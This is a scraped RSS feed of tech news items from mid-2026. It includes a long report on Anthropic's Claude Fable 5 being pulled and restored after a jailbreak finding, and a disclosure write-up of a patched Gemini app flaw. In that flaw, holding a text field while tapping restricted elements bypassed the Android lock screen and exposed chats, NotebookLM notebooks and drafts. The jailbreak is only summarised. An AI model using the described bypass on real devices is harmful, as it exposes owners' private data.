<p>García de Viedma said the latest package represents “good progress, which is defining technological sovereignty as risk mitigation.” In this case, risk has three aspects: technological dependence could be used as a coercive measure; tech operations could be disrupted “if at any point our alliances deteriorate;” and IT could be used as a tool for surveillance. </p>



<p>“Not to sound like conspiracy theorists, but the fact is that there is a possibility that whoever controls the communication nodes and software has the ability to see, if not everything, then at least some things,” he said. “That gives them an advantage.” Therefore, sovereignty is not so much “that identity-based vision” but rather one of “risk avoidance.” It’s not about using European technology simply because it’s European, but about understanding the risks of not using it.</p>



<p>Viedma believes the Commission has accurately identified today’s problems (such as governance or the digitization of the power grid, “the main bottleneck for AI”) but wonders about the future. Added to this is the issue of money: investment is a key piece in this chess game.</p>



<p>DigitalES views the efforts currently under way — such as those regarding European chips — favorably. “What’s needed is more determination and focus,” said Arias. Incidents like the Anthropic case can “help move in that direction.” While European investment plans in AI may seem less grandiose than those of the sector’s major companies, Arias warned against defeatist rhetoric. <br></p>



<p>“The EU is doing what it needs to do,” he said, and is creating “a more geopolitically stable environment for investors. Ultimately, this is about the market and who creates the most value.” European regulations can eventually become global standards, with Europe positioning itself “as an attractive partner for investment” — one that is “reliable and more predictable.”</p>



<p>Arias said the key lies not in complete autonomy, but in finding a balance. “We don’t have to produce 100% of what we use, and we shouldn’t depend 100% on a single supplier or jurisdiction.” What’s needed is technological diplomacy, being able to navigate complex waters and safeguard interests.</p>



<p>Playing by different rules in the global AI market is not feasible. “You must be aware of your strengths and weaknesses.” And she insists: “Europe is by no means a long shot — quite the opposite, because it offers certain guarantees.”</p>



<h2 class="wp-block-heading">The next great revolution</h2>



<p>Europe is late to the AI race, but it can still “assume a certain leadership role,” depending on how the sector evolves, as García de Viedma notes. Europe can carve out its own niche and investments are being made and efforts are under way to do so. In AI, this involves identifying areas of European specialization.</p>



<p>There remains a lot of work to be done and, possibly, lessons learned from past experiences to face what lies ahead. AI issues are part of a very complex reality. Arias warned of the need to prepare for “the convergence of artificial intelligence with the computing power that quantum computing will provide” featuring “dual-use technology that will be employed for both military and civilian purposes.” These will be more powerful tools that “require a more solid foundation.</p>



<p>“Such technological diplomacy will be necessary to negotiate global quantum standards, protect intellectual property, and address the potential impact on national security.”</p>



<p>The quantum revolution is imminent, but has yet to unfold, and Europe can capitalize on <a href="https://www.computerworld.es/article/4067287/especial-tecnologia-cuantica-2025.html">it</a>. “Europe is jumping on this bandwagon,” argued Arias, highlighting the investments and work on quantum capabilities. “We’re in a very different situation than we were with the cloud and artificial intelligence.” The EU is “acting quickly” and opening the door to “positioning ourselves country by country.” </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Comcast’s split could make or break Peacock]]></title>
<description><![CDATA[NBCUniversal executives are about to find out whether Peacock will sink or swim in the streaming industry. Now that Comcast is planning to split NBCUniversal, Peacock, and Sky from its broadband and wireless businesses, Peacock will be forced to stand on its own - without the backing of a combine...]]></description>
<link>https://tsecurity.de/de/3639030/it-nachrichten/comcasts-split-could-make-or-break-peacock/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639030/it-nachrichten/comcasts-split-could-make-or-break-peacock/</guid>
<pubDate>Wed, 01 Jul 2026 18:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[NBCUniversal executives are about to find out whether Peacock will sink or swim in the streaming industry. Now that Comcast is planning to split NBCUniversal, Peacock, and Sky from its broadband and wireless businesses, Peacock will be forced to stand on its own - without the backing of a combined company that pulled in more […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic is bringing back Claude Fable 5 globally after US lifts export control order — where can enterprises access it?]]></title>
<description><![CDATA[Anthropic is restoring global access to its most powerful generally released AI model yet, Claude Fable 5, today,  after the U.S. Department of Commerce withdrew emergency export controls that led the company to suspend all access to both Fable 5 and its less restricted cybersecurity counterpart ...]]></description>
<link>https://tsecurity.de/de/3639021/it-nachrichten/anthropic-is-bringing-back-claude-fable-5-globally-after-us-lifts-export-control-order-where-can-enterprises-access-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639021/it-nachrichten/anthropic-is-bringing-back-claude-fable-5-globally-after-us-lifts-export-control-order-where-can-enterprises-access-it/</guid>
<pubDate>Wed, 01 Jul 2026 18:03:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Anthropic is <a href="https://www.anthropic.com/news/redeploying-fable-5">restoring global access </a>to its most powerful generally released AI model yet, Claude Fable 5, today,  after the U.S. Department of Commerce withdrew emergency export controls that led the company to <a href="https://venturebeat.com/technology/anthropic-blocks-all-public-access-to-claude-fable-5-mythos-5-following-us-government-order-what-enterprises-should-do">suspend all access to both Fable 5 and its less restricted cybersecurity counterpart model Claude Mythos 5</a> last month, just days after both models were initially introduced. </p><p>Starting today, Fable 5 is available for users globally across the primary Anthropic ecosystem, including the Claude Platform, Claude.ai, Claude Code, and Claude Cowork. However, when VentureBeat tried to access it in Claude Code on Terminal, it still showed as disabled.</p><p>For organizations leveraging cloud hyperscalers, Anthropic says it is moving to re-enable access on Amazon Web Services, Google Cloud, and Microsoft Foundry “as quickly as possible.” So far, VentureBeat's research has been unable to confirm if the models have been restored on these external cloud hyperscaler platforms yet.</p><p>Mythos 5 remains a different case. A<a href="https://x.com/synthwavedd/status/2072103052635451559?s=61&amp;t=2nI-irIukCMlctN6d7atlQ"> letter posted on the social network X </a>allegedly from U.S. Commerce Secretary Howard Lutnick to Anthropic executive Tom Brown says a license is no longer required for the export, reexport, or in-country transfer of Fable<i> and Mythos.</i></p><p>But Anthropic’s own <a href="https://www.anthropic.com/news/redeploying-fable-5">redeployment post on its website </a>says only that Mythos 5 access has been restored for “a set of US organizations,” following government approval on June 26. The company says it is continuing to coordinate with the government to expand access to broader domestic and international partners in its opt-in cybersecurity testing program, <a href="https://venturebeat.com/technology/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release">Project Glasswing</a>.</p><p>That leaves Mythos 5 in a middle category: legally cleared from the emergency export-control order, but not generally available. The current limit appears to come from Anthropic’s decision to keep Mythos behind a vetted-access model, with the U.S. government still playing a role in approvals, standards and expansion.</p><p>Posting on X, Commerce Secretary Howard Lutnick <a href="https://x.com/howardlutnick/status/2072100729603452965">said</a> Anthropic and the government had “worked closely” to “analyze and approve Fable 5,” while White House Chief of Staff Susie Wiles also <a href="https://x.com/SusieWiles47/status/2072099604481335711">posted</a> on X, framing the decision around U.S. AI leadership and deployment speed.</p><p>Wiles wrote that the United States is the “undisputed winner in the AI race,” adding that the shared priority is to “get the best tech deployed as quickly and safely as possible.”</p><p>The reversal follows concerns from cybersecurity leaders and AI policy experts over the export control order, who argued that the U.S. risked hobbling its own industry while giving Chinese AI labs an opening. Former Facebook security chief Alex Stamos <a href="https://www.aol.com/articles/smart-people-saying-return-anthropics-111539000.html?guccounter=1&amp;guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&amp;guce_referrer_sig=AQAAACxDu4x_4FTNyEqy2d4xTCQyaaDeOvRTwjggSIpCok-dRgvkDZQ_tc_RJvuzEqvn7NDqYyR2BWm5PfnU6hIFjuMxDj-8nalhiKxWb6hkO9f93vUbBN0PzrDkB5FRqE5Hs0hHMnPxJR5gdAAD2G-PCK4SEvYRlcBT0_tnlPU6l-Ey">called</a> the Fable restriction a “huge own goal for the US,” warning that security companies could be driven toward Chinese models, while other critics said the so-called "ad hoc" regulatory intervention made dependence on U.S. AI platforms look like a strategic liability.</p><h2><b>Reminder on Claude Fable 5 pricing</b></h2><p>For chief information and technology officers evaluating the return of the model, the deployment comes with distinct structural conditions and significant financial investments.</p><p>Anthropic is pricing both Fable 5 and Mythos 5 at $10.00 per million input tokens and $50.00 per million output tokens, the most expensive of all frontier models globally.</p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p>LongCat-2.0 — limited-time promo</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>LongCat-2.0 — standard</p></td><td><p>$0.75</p></td><td><p>$2.95</p></td><td><p>$3.70</p></td><td><p><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">LongCat</a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot AI</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$1.00</p></td><td><p>$6.00</p></td><td><p>$7.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p><b>Claude Fable 5 / Claude Mythos 5</b></p></td><td><p><b>$10.00</b></p></td><td><p><b>$50.00</b></p></td><td><p><b>$60.00</b></p></td><td><p><b></b><a href="https://platform.claude.com/docs/en/about-claude/models/overview"><b>Anthropic</b></a></p></td></tr></tbody></table><p>However, to incentivize immediate enterprise adoption following the export control order disruption saga, Anthropic is executing a temporary rollout plan through July 7. </p><p>For Pro, Max, Team, and select Enterprise subscriptions, Fable 5 usage will be included at no added cost for up to 50% of a user’s weekly tier allowance.</p><p>However, after July 7, Fable 5 will move to usage credits for those plans. For standard Enterprise seats, there is no included Fable 5 allowance; all usage is billed through credits, and the model will not work for those users unless credits are enabled.</p><p>Already, some AI influencers are attempting to offer enterprises and developers guidance on how to maximize their usage of Fable 5 during its 7-day discounted price/subscription included promotion:</p><div></div><h2><b>Chronology of a Crisis: From Launch to Lockout</b></h2><p>The whiplash regulatory cycle surrounding the model underscores the volatility currently facing enterprise software supply chains. The crisis unfolded over a rapid, three-week timeline:</p><ul><li><p><b>June 9, 2026:</b> <a href="https://venturebeat.com/technology/anthropic-brings-mythos-to-the-masses-with-claude-fable-5-its-most-powerful-generally-available-model-ever">Anthropic launches Claude Fable 5 and Mythos 5</a>. Early corporate case studies report major performance gains. For instance, Stripe reports that Fable 5 compressed a codebase-wide migration across a 50-million-line Ruby infrastructure into a single day — a project estimated to take a team more than two months by hand.</p></li><li><p><b>June 12, 2026:</b> At 5:21 PM ET, the U.S. government issues an export-control directive citing national security authorities. The order bans access to the models by any foreign national, whether inside or outside the borders of the United States. Lacking real-time mechanisms to verify user nationality at the API layer, Anthropic is forced to pull the plug for all customers to ensure compliance. Anthropic says access to all other Anthropic models was not affected.</p></li><li><p><b>June 13–25, 2026:</b> Enterprise users and developers face abrupt disruption, forcing workflows that had adopted Fable 5 or Mythos 5 to fall back to older models such as Opus 4.8. Tensions peak as Anthropic publicly objects, arguing that pulling a major commercial model over a narrow jailbreak finding could “essentially halt all new model deployments for all frontier model providers.”</p></li><li><p><b>June 26, 2026:</b> The U.S. government allows Anthropic to restore Mythos 5 access to a set of trusted U.S. organizations, partially reversing the June 12 order. Anthropic says it is restoring access for those organizations and continuing to work with the government to expand Mythos 5 access and make Fable 5 generally available again.</p></li><li><p><b>June 30, 2026:</b> Commerce Secretary Howard Lutnick sends a letter withdrawing the June 12 export-control license requirement for both Mythos and Fable. The decision removes the emergency legal block, but Anthropic’s rollout still treats the models differently: Fable 5 returns globally, while Mythos 5 remains limited to approved users through Glasswing and related trusted-access channels.</p></li></ul><h2><b>The Technical Catalyst: The Amazon Vulnerability Report</b></h2><p>The swift intervention by the federal government stemmed from a report by Amazon researchers describing a method for bypassing Fable 5’s safeguards. This was a brutal irony for Anthropic, given Amazon was one of the startup's initial and largest backers to the <a href="https://venturebeat.com/ai/amazon-doubles-down-on-anthropic-positioning-itself-as-a-key-player-in-the-ai-arms-race">tune of $8 billion</a>, and the two companies previously collaborated on <a href="https://www.anthropic.com/news/claude-and-alexa-plus">improving Amazon's Alexa+ voice assistant</a>.</p><p>According to Anthropic, the technique prompted Fable 5 to identify software vulnerabilities; in one case, the model produced code demonstrating how the relevant vulnerability could be exploited.</p><p>When the report reached government officials, it triggered alarm regarding the offensive cyber capabilities of public LLMs. Anthropic countered that the exploit did not tap into unique “Mythos-level” cyber capabilities, noting that its own testing found other models — including Claude Opus 4.8, OpenAI’s GPT-5.5, and Moonshot’s Kimi K2.7 — could identify the same vulnerabilities. Anthropic also said every model it tested could produce the same exploit demonstration as Fable 5.</p><p>To break the regulatory logjam, Anthropic developed an improved automated safety classifier specifically trained to catch and neutralize the Amazon technique. Tested by the Commerce Department’s Center for AI Standards and Innovation (CAISI), the updated classifier successfully halts that specific technique in more than 99% of cases.</p><p>Anthropic explicitly warns enterprise clients that this safety enforcement comes at an operational cost. Because the new classifiers require an expanded “safety margin” to catch ambiguous edge cases, benign coding and debugging requests may be flagged more often. When a prompt is blocked by the safety layer, the active session automatically downgrades, routing the request to Opus 4.8.</p><h2><b>Backroom Diplomacy: The Shifting of the Guard</b></h2><p>The breakthrough that brought Fable 5 back to commercial markets was as much political as it was technical. According to <a href="https://www.wired.com/story/trump-administration-lifts-export-controls-on-anthropics-mythos-and-fable-ai-models/">WIRED</a>, Anthropic initially argued that the administration’s security concerns were overblown and that no frontier model provider could guarantee zero jailbreaks.</p><p>That argument frustrated the administration, according to WIRED’s reporting. In recent weeks, Anthropic changed tack, focusing less on the theoretical impossibility of eliminating jailbreaks and more on building stronger safeguards and satisfying the government’s operational concerns.</p><p><a href="https://www.wired.com/story/the-trump-white-house-is-over-anthropics-dario-amodei/">WIRED reported</a> that Anthropic CEO Dario Amodei was recently replaced in meetings by Brown, whom officials liked more personally. Brown is also the addressee of Lutnick’s June 30 Commerce letter.</p><p>Under Brown’s guidance, Anthropic appears to have moved from arguing over the absolute limits of model safety to committing to the expanded safeguards and collaboration framework the administration demanded.</p><p>The resulting Commerce letter describes several commitments by Anthropic. Under the terms of the clearance, Anthropic has agreed to:</p><ol><li><p>Proactively detect and address security risks associated with the models.</p></li><li><p>Work with the U.S. government on protocols, standards and releases for Mythos, Fable and future models.</p></li><li><p>Inform the U.S. government of malicious activity.</p></li></ol><p>Separately, Anthropic says it will expand pre-release government access and evaluation for frontier models, share information rapidly when significant jailbreaks or misuse patterns are identified, dedicate resources to joint government research and work toward a common industry security bar.</p><p>The U.S. Commerce Department explicitly reserved the right to re-evaluate these permissions and re-impose license requirements if circumstances change or if Anthropic fails to meet its commitments.</p><h2><b>The Sovereign Calculus: Lessons for Enterprise AI</b></h2><p>The two-week blackout of Claude Fable 5 exposed the fragility of centralized, closed-API models for modern business infrastructure. It showed that enterprise automation pipelines remain vulnerable to sudden regulatory shifts and vendor compliance mandates.</p><p>The tech community’s response highlights a broader push toward hardware and model sovereignty. Following the initial shutdown, prominent tech figures voiced concerns over this centralization. <a href="https://x.com/AlexFinn?lang=en">AI founder Alex Finn </a>described the Anthropic freeze as a major “wakeup call,” urging developers to invest heavily in local, open-weights infrastructure to insulate operations from federal volatility. As Finn noted on social media:</p><blockquote><p>“No company or government will EVER be able to take away your local models.”</p></blockquote><p>For enterprise architects, the return of Fable 5 demands a balanced approach to deployment:</p><ul><li><p><b>The Frontier Performance Advantage:</b> Utilizing closed models like Fable 5 offers state-of-the-art capabilities across agentic coding, long-context work, document reasoning and multi-step enterprise automation, according to Anthropic’s launch materials and early customer examples.</p></li><li><p><b>The Mitigating Data Trade-Off:</b> Accessing Fable 5 means accepting Anthropic’s mandatory 30-day data retention requirement for covered models. Anthropic says prompts and model completions are retained for at least 30 days by default and then automatically deleted, except when they are part of a safety investigation or must be kept for legal reasons. Highly regulated financial, healthcare and legal groups must evaluate whether this telemetry window complies with their data privacy mandates.</p></li></ul><p>The truth is, enterprises in the U.S. and globally have more options than ever for frontier-class LLMs, especially with the recent launch over the last few months of new, powerful, open weights Chinese alternatives that can be downloaded, run locally or on virtual private clouds, and customized to an enterprise's liking. </p><p><a href="https://venturebeat.com/technology/minimax-m3-debuts-eclipsing-gpt-5-5-and-gemini-3-1-pro-on-key-benchmark-performance-for-just-5-10-of-the-cost">MiniMax M3 </a>pairs frontier-tier coding and agentic performance with a 1 million-token context window and native multimodality. Z.ai’s <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">GLM-5.2's benchmark results</a> exceed OpenAI's GPT-5.5 on SWE-bench Pro and several long-horizon coding tests, and near Claude Opus 4.8 on FrontierSWE and MCP-Atlas. <a href="https://venturebeat.com/technology/meituan-open-sources-longcat-2-0-the-1-6t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips">Meituan’s LongCat-2.0 </a>is also positioned around enterprise use, with a 1 million-token context window, MIT licensing and strong early developer traction through its Owl Alpha run on OpenRouter — though as we reported, the full weights are still listed as “coming soon.” </p><p>Meanwhile, Anthropic's top domestic rival OpenAI is still struggling to release its latest models broadly due to U.S. government pressure. The company says its <a href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov">newest and most powerful models, GPT-5.6 Sol, Terra and Luna</a> — unveiled last week — are starting in a limited preview for a small group of trusted partners after OpenAI previewed the models and their capabilities to the U.S. government and the government requested the rollout be staggered.</p><p>OpenAI says it still plans broader availability, but argued in its <a href="https://openai.com/index/previewing-gpt-5-6-sol/">announcement</a> that this kind of staggered rollout at the government's request "should become the long-term default. It keeps the best tools from users, developers, enterprises, cyber defenders, and global partners who need them. We are taking this short-term step because we believe it is the strongest path to broader availability in the coming weeks, while we work with the Administration to develop the cyber Executive Order framework and a repeatable process for future model releases."</p><p>The executive order in question, signed by <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/">President Donald J. Trump on June 2, 2026</a>, calls upon various federal agencies to collaborate on a process for benchmarking and assessing capabilities of new AI models to ensure they are safe and appropriate for wide release, a process supposed to take 30 days (which would seem to indicate the agencies are due to provide their process tomorrow, July 2, 2026.)</p><p>Frontier model launches are starting to look less like ordinary product releases and more like negotiated deployments shaped by U.S. national security review — a shift that could slow American distribution even as Chinese competitors move aggressively through open-weight and lower-cost channels</p><p>To safeguard operations against future regulatory lockouts, enterprise technical leaders are moving toward model-agnostic fallback architectures. </p><p>By deploying proxy layers that can dynamically reroute critical production pipelines from proprietary APIs to locally hosted, open-weights alternatives, businesses can leverage top-tier capabilities without exposing themselves to single-point-of-failure vulnerabilities. </p><p>Fable 5 is officially back online, but the landscape governing its release has been fundamentally transformed.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Families, farmers, and small businesses should not be forced to cover the costs of new power generation’: Forget Trump’s voluntary commitment, this new bipartisan act wants to force AI companies to pay for the energy they use]]></title>
<description><![CDATA[The Ratepayer Protection Act will put some teeth into big tech, forcing them to pay for increased energy consumption, demand, and capacity.]]></description>
<link>https://tsecurity.de/de/3638631/it-nachrichten/families-farmers-and-small-businesses-should-not-be-forced-to-cover-the-costs-of-new-power-generation-forget-trumps-voluntary-commitment-this-new-bipartisan-act-wants-to-force-ai-companies-to-pay-for-the-energy-they-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638631/it-nachrichten/families-farmers-and-small-businesses-should-not-be-forced-to-cover-the-costs-of-new-power-generation-forget-trumps-voluntary-commitment-this-new-bipartisan-act-wants-to-force-ai-companies-to-pay-for-the-energy-they-use/</guid>
<pubDate>Wed, 01 Jul 2026 15:17:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Ratepayer Protection Act will put some teeth into big tech, forcing them to pay for increased energy consumption, demand, and capacity.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic’s Fable 5 is back after US shutdown it called 'a misunderstanding']]></title>
<description><![CDATA[Anthropic’s most advanced public Claude model is returning after a US government directive forced it offline — but the episode raises bigger questions about who controls access to frontier AI.]]></description>
<link>https://tsecurity.de/de/3638343/it-nachrichten/anthropics-fable-5-is-back-after-us-shutdown-it-called-a-misunderstanding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638343/it-nachrichten/anthropics-fable-5-is-back-after-us-shutdown-it-called-a-misunderstanding/</guid>
<pubDate>Wed, 01 Jul 2026 13:32:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anthropic’s most advanced public Claude model is returning after a US government directive forced it offline — but the episode raises bigger questions about who controls access to frontier AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[Is the Android Lock Screen an Illusion? A Critical Logical Bypass Discovered in the Gemini App]]></title>
<description><![CDATA[Image generated by Google GeminiNOTE: As of the publication of this article, the vulnerability has been fully patched, and all coordination regarding disclosure was managed directly with the Google VRP team.Introduction: “Security Architecture vs. The Real World”How can Android’s foundational sec...]]></description>
<link>https://tsecurity.de/de/3638146/hacking/is-the-android-lock-screen-an-illusion-a-critical-logical-bypass-discovered-in-the-gemini-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638146/hacking/is-the-android-lock-screen-an-illusion-a-critical-logical-bypass-discovered-in-the-gemini-app/</guid>
<pubDate>Wed, 01 Jul 2026 12:21:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9_XxbXU5gPX6wrq251_tIg.png"><figcaption>Image generated by Google Gemini</figcaption></figure><p><strong>NOTE:</strong> <em>As of the publication of this article, the vulnerability has been fully patched, and all coordination regarding disclosure was managed directly with the Google VRP team.</em></p><h3>Introduction: “Security Architecture vs. The Real World”</h3><p>How can Android’s foundational security layer, the Keyguard, falter when confronted with the complexity of a modern AI interface? The answer is simple: as systems grow more complex, the impact of overlooked edge cases amplifies.</p><p>In this write-up, I will dissect how a simple multi-touch interaction triggered a critical logical security flaw. I’ll provide the technical details of how this vulnerability bypassed the lock screen — the very boundary designed to be the most secure — and exposed sensitive user data.</p><h3>How I Discovered It</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/426/1*bfiQwfzmzuTXg4qGaLwLKA.gif"><figcaption><strong>Fig 1: </strong>Demonstration of the Multi-touch Bypass</figcaption></figure><p>I didn’t uncover this vulnerability using automated scanning utilities or complex fuzzing frameworks; rather, it surfaced organically during my daily user experience. I noticed that multi-finger interactions within the user interface triggered benign functions that should have been restricted under specific device states. While an average user might dismiss this behavior as a transient UI glitch, to a security researcher, it signaled a potential flaw.</p><p>Further analysis revealed that invoking specific operational modes, such as Lyria or Deep Research, forced the application into a full-screen state. Initially, interaction was restricted, and the system prompted for credentials. However, applying the multi-touch technique I discovered earlier circumvented these constraints, granting unauthorized access to application settings and chat histories. By expanding the attack surface during my research, I confirmed that critical assets like NotebookLM notebooks and Gmail drafts were equally vulnerable, subsequently documenting and escalating these findings to Google.</p><h3>Technical Analysis</h3><p>Gemini’s modular features bypassed the system Keyguard due to an architectural misconfiguration. The application improperly exposed UI elements that should remain strictly inaccessible while the device is locked. Although the system repeatedly invoked the Keyguard to request authentication during these operations, I successfully bypassed the lock state by leveraging a form of <strong>Context Hijacking</strong>.</p><p>The root cause lies in inadequate validation of concurrent UI interactions. By maintaining an active press on a permitted interaction area (such as a text input field) while simultaneously tapping a restricted target element, the application failed to isolate the input contexts. This race-like UI interaction completely neutralized the application’s internal security control mechanisms, turning a seemingly minor interface bug into a robust logical bypass.</p><a href="https://medium.com/media/e9c63ce92d169f8571147826f68417cf/href">https://medium.com/media/e9c63ce92d169f8571147826f68417cf/href</a><h4><strong>Impact &amp; Exploitation Surface</strong></h4><p>During the initial phase of my research, the exploit vectors were limited to reading, deleting, or renaming historical chats, accessing Gemini’s core settings, and viewing profile data. However, digging deeper into the application’s ecosystem revealed a significantly more severe impact:</p><ul><li><strong>Arbitrary Creation of Gmail and Google Docs Drafts:</strong> Allowing unauthenticated data injection into core Google services.</li><li><strong>Unauthorized Access to NotebookLM:</strong> Exposing proprietary or highly sensitive personal and enterprise data stored within notebooks.</li><li><strong>Gem Execution:</strong> Triggering custom AI agents without owner authentication.</li><li><strong>Destructive Actions:</strong> Permanently deleting critical NotebookLM assets.</li></ul><p>The practical implications of this vulnerability present severe risks, including data exfiltration, advanced social engineering scenarios via unauthorized draft creation, and the compromise of enterprise-grade environments.</p><h3>Coordination and Disclosure 